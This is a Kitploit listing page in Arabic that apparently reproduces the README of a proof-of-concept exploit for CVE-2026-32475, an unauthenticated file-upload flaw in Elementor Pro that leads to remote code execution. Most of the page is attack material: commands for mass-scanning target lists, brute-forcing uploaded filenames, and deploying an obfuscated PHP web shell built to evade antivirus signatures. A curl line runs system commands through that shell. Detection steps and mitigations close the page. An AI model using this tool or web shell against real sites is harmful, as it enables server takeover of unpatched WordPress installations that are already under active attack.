Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-32475 — إثبات مفهوم لاستغلال CVE-2026-32475، وهو رفع ملفات تعسفي غير مصادق عليه في Elementor Pro يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد. يتضمن فحصًا جماعيًا، وتأكيد اسم الملف بالقوة الغاشمة، وقشرة ويب مشفرة مدمجة للاختبار المصرح به. | Kitploit
أدوات/GitHubGitHub/4minx/cve-2026-32475
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقتطوير الحمولات
GitHub4minx/cve-2026-32475

CVE-2026-32475

إثبات مفهوم لاستغلال CVE-2026-32475، وهو رفع ملفات تعسفي غير مصادق عليه في Elementor Pro يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد. يتضمن فحصًا جماعيًا، وتأكيد اسم الملف بالقوة الغاشمة، وقشرة ويب مشفرة مدمجة للاختبار المصرح به.

عرض المستودع
1415منذ 20 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-32475 PoC: Elementor Pro رفع ملفات تعسفي غير مصادق عليه يؤدي إلى تنفيذ كود عن بُعد

رفع ملفات تعسفي قبل المصادقة في Elementor Pro يؤدي إلى تنفيذ كود عن بُعد

إثبات المفهوم لـ CVE-2026-32475، وهو ثغرة حرجة في رفع الملفات التعسفي غير المصادق عليه في وحدة النماذج (Forms) في Elementor Pro تنتهي بتنفيذ كود عن بُعد. يرسل إثبات المفهوم جزأين من الملف لنفس حقل الرفع — إدخال أول فارغ (اسم ملف فارغ، مما يطلق UPLOAD_ERR_NO_FILE) يليه الحمولة. حلقة validation() تخرج مبكرًا عند الإدخال الفارغ عبر return بينما تتخطاه process_field() عبر continue، لذا لا يتم فحص امتداد الحمولة أبدًا وتستقر في دليل عام بامتداد .php. إثباتات المفهوم التي تختبر السلوك المُصحح، نفس الطلب بعد التصحيح، يجب أن يتم رفضها بواسطة فحص الامتداد.

ملاحظة: إثبات المفهوم هذا مخصص لاختبار الأمان المصرح به والبحث فقط. CVE-2026-32475 يتم استغلاله بنشاط في البرية، وقد حجبت Wordfence أكثر من 190,000 محاولة منذ الإفصاح في 19 أغسطس. أنت مسؤول عن الامتثال لجميع القوانين المعمول بها والحصول على إذن كتابي قبل اختبار أي نظام.


معلومات الثغرة

  • CVE: CVE-2026-32475
  • النوع: CWE-434 رفع غير مقيد لملف بنوع خطير
  • CVSS 3.1: 9.0 (حرجة، AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • المصادقة: غير مصادق عليه (قبل المصادقة، عن بُعد، تعقيد هجوم منخفض)
  • الاستغلال النشط: نعم (تسليح في نفس اليوم؛ أكثر من 190,000 محاولة محجوبة في الفترة 19–23 أغسطس)
  • البرنامج المتأثر: Elementor Pro (إضافة ووردبريس تجارية)، الإصدارات <= 4.2.1
  • تم الإصلاح في: 4.2.2 (صدر في 19 أغسطس 2026)
  • تم الإبلاغ بواسطة: Tin Pham (TF1T) عبر Patchstack؛ Austin Ginder عبر Wordfence (مكافأة 15,600 دولار)
  • الإفصاح: 19 أغسطس 2026

المتطلبات

  • Python 3.8+ مع مكتبة requests
  • الهدف: موقع ووردبريس يحتوي على Elementor Pro <= 4.2.1 ونموذج منشور يحتوي على حقل رفع ملفات

تثبيت التبعيات:

root@kitploit:~
pip install requests

الاستخدام

هدف واحد

root@kitploit:~
python cve-2026-32475-poc.py -t http://localhost/wplab/?page_id=6

تأكيد التنفيذ (تخمين اسم ملف uniqid() بالقوة الغاشمة)

root@kitploit:~
python cve-2026-32475-poc.py -t http://localhost/wplab/?page_id=6 --brute --seconds-window 3

رفع ويب شيل مبهم مدمج

root@kitploit:~
python cve-2026-32475-poc.py -t http://localhost/wplab/?page_id=6 --shell --brute

--shell يرفع ويب شيل PHP مبهمًا بسيطًا (يتم بناء الكلمات المفتاحية في وقت التشغيل عبر chr()/implode/strrev، معلمة الأمر vapcom) بحيث لا تلتقطه التوقيعات الثابتة البسيطة أو عمليات الفحص اللحظي لمضاد الفيروسات على القرص. اسم الملف المخزن لا يزال عشوائيًا (<uniqid()>.php)؛ ادمجه مع --brute، الذي يفحص ?vapcom=echo <marker> ويبلغ عن exec confirmed: <name>.php. الاستخدام اليدوي بعد تحديد الموقع:

root@kitploit:~
curl "http://TARGET/wp-content/uploads/elementor/forms/<uniqid>.php?vapcom=id"

فحص جماعي

root@kitploit:~
python cve-2026-32475-poc.py -T targets.txt -o results.csv

حمولة مخصصة

root@kitploit:~
python cve-2026-32475-poc.py -t http://target/page-with-form/ --payload ./lab-shell.php

الخيارات

الوسيطالوصفالافتراضي
-t, --targetرابط هدف واحد-
-T, --targetsملف يحتوي على روابط الأهداف، رابط واحد في كل سطر-
-o, --outputملف النتائج (CSV: target, status, form_id, post_id, field, note)-
--timeoutمهلة الطلب بالثواني15
--post-idتجاوز post_id المكتشفتلقائي
--form-idتجاوز form_id المكتشف (معرف عنصر Elementor)تلقائي
--fieldتجاوز custom_id لحقل الرفع المكتشفتلقائي
--payloadمسار ملف حمولة مخصص (الافتراضي: ملف رمز PHP غير ضار)رمز غير ضار
--shellرفع ويب شيل PHP مبهم مدمج (<?php ... system($_GET) ?> مبني في وقت التشغيل، المعلمة vapcom) بدلاً من الرمزإيقاف
--bruteبعد رفع ناجح، تخمين اسم ملف uniqid() بالقوة الغاشمة لتأكيد تنفيذ الكودإيقاف
--seconds-windowالثواني قبل/بعد ترويسة Date للخادم للتخمين بالقوة الغاشمة5

مثال على المخرجات

root@kitploit:~
[*] Probing http://localhost/wplab/?page_id=6 ...
[+] Form found: post_id=6 form_id=a1b2c3d4 field=upload_file
[*] AJAX -> HTTP 200
[*] result: vulnerable - upload accepted
    response    : {"success":true,"data":{"message":"Your submission was successful.","data":[]}}
    uploaded to : /wp-content/uploads/elementor/forms/<uniqid>.php
[+] CONFIRMED EXECUTION: 6a9bb5d70fba6.php -> 'POC3f9a2c...'

[*] done: 1/1 vulnerable

استجابة success:true على طلب AJAX تعني أن الحمولة تم قبولها بدون فحص الامتداد. الخطوة 4 مع --brute (استجابة 200 على ملف .php المُخمَّن الذي يحتوي على العلامة) تؤكد تنفيذ PHP على الخادم — أي RCE كامل.

حالات النتائج: vulnerable | patched | unknown | error

  • vulnerable — خادم الويب أعاد "success":true؛ الحمولة تجاوزت فحص الامتداد
  • patched — تم رفض الرفع مع خطأ في نوع الملف (تم تنفيذ فحص الامتداد)
  • unknown — نجح HTTP لكن الاستجابة لم تكن success:true (معرفات خاطئة أو حالة غير متوقعة)
  • error — فشل الطلب/التحليل (مهلة، غير 200، نموذج غير موجود)

سلوك الحمولة وملاحظات ويب شيل

  • اسم الملف المخزن دائمًا <uniqid()>.<امتداد_المهاجم> — يتم تجاهل اسم الملف الأساسي المُرسل، لذا فإن حيل الامتداد المزدوج/البايت الفارغ غير ذات صلة؛ فقط فحص الامتداد هو المهم، وهو ما يتعطل.
  • يشحن Elementor ملف .htaccess في wp-content/uploads/elementor/forms/ يضبط Content-Disposition: attachment على جميع الملفات. هذا لا يوقف التنفيذ — لا يزال PHP يعمل على الخادم والاستجابة المُنزَّلة هي المخرجات المنفذة. لعرض شيل في المتصفح في بيئة مختبرية، عطّل ملف .htaccess هذا؛ في العالم الحقيقي اعتبره تجميليًا فقط واعتمد على حظر PHP على مستوى الخادم.
  • uniqid() = sprintf("%08x%05x", uint32(tv_sec), tv_usec)، لذا فإن الاسم مشتق من الوقت (ثواني يونكس، 32 بت منخفضة، + ميكروثانية). خطوة التخمين بالقوة الغاشمة تحصر الثانية المرصودة في ترويسة Date لاستجابة الإرسال، وبالنسبة لملفات .php، تطلب ?vapcom=echo <marker> (أو ?c= لملف الرمز/--payload) بحيث تكون الاستجابة التي تحمل العلامة تنفيذ PHP فعليًا على الخادم، وليس مجرد قراءة ملف. أسوأ حالة هي ~1 مليون تخمين ميكروثانية في الثانية، لذا اضبط --seconds-window لإبقاء عمليات التشغيل قصيرة.

اكتشاف / التحقق من الاختراق

root@kitploit:~
# ملفات PHP التي يجب ألا تكون موجودة في دليل الرفع
find wp-content/uploads/elementor/forms/ -type f -name "*.php*"
  • تعامل مع أي ملف .php/.phtml/.phar/.hta تحت دليل النماذج كدليل على الاختراق.
  • ابحث في سجلات الوصول عن GET تحت /wp-content/uploads/elementor/forms/ وPOST يحمل elementor_pro_forms_send_form.
  • إذا تم تنفيذ شيل، ابحث عن مسؤولين مزيفين، وmu-plugins، وملفات أساسية/قوالب معدلة، وأحداث WP-Cron غير متوقعة؛ يُفضل استعادة نسخة احتياطية معروفة الجودة على التنظيف في المكان.

التخفيفات

  • قم بالترقية إلى Elementor Pro 4.2.2 أو أحدث. يتم تسليم تحديثات Elementor Pro عبر خدمة Elementor الخاصة — الترخيص المنتهي لن يعرض التحديث.
  • إذا لم تتمكن من التصحيح فورًا، امنع تنفيذ PHP داخل دليل الرفع على مستوى خادم الويب (قاعدة location في nginx أو <FilesMatch> في Apache). هذا هو الإصلاح الدائم ويخفض هذه الثغرة وثغرات الرفع المستقبلية إلى "إهدار مساحة القرص".
  • حصر النماذج المنشورة؛ قيّد أنواع الملفات المقبولة؛ أزل حقول الرفع غير المستخدمة.
  • بعد الترقية: افحص دليل الرفع، وراجع حسابات المسؤولين، ودقق السجلات بحثًا عن الإجراء elementor_pro_forms_send_form.

المراجع

  • Patchstack — ثغرة حرجة في رفع ملفات غير مصادق عليه يؤدي إلى RCE في Elementor Pro
  • Wordfence — المهاجمون يستغلون بنشاط ثغرة حرجة في Elementor Pro
  • MagicWP — CVE-2026-32475: رفع ملفات تعسفي في Elementor Pro
  • NVD — CVE-2026-32475
  • dev.to — استغلال نشط لويب شيل PHP عبر تجاوز التحقق من المصفوفات
  • deniz.in — Elementor Pro RCE: رفع ملفات غير مُتحقق منه تم إصلاحه في الإصدار 4.2.2
تنزيل الأداة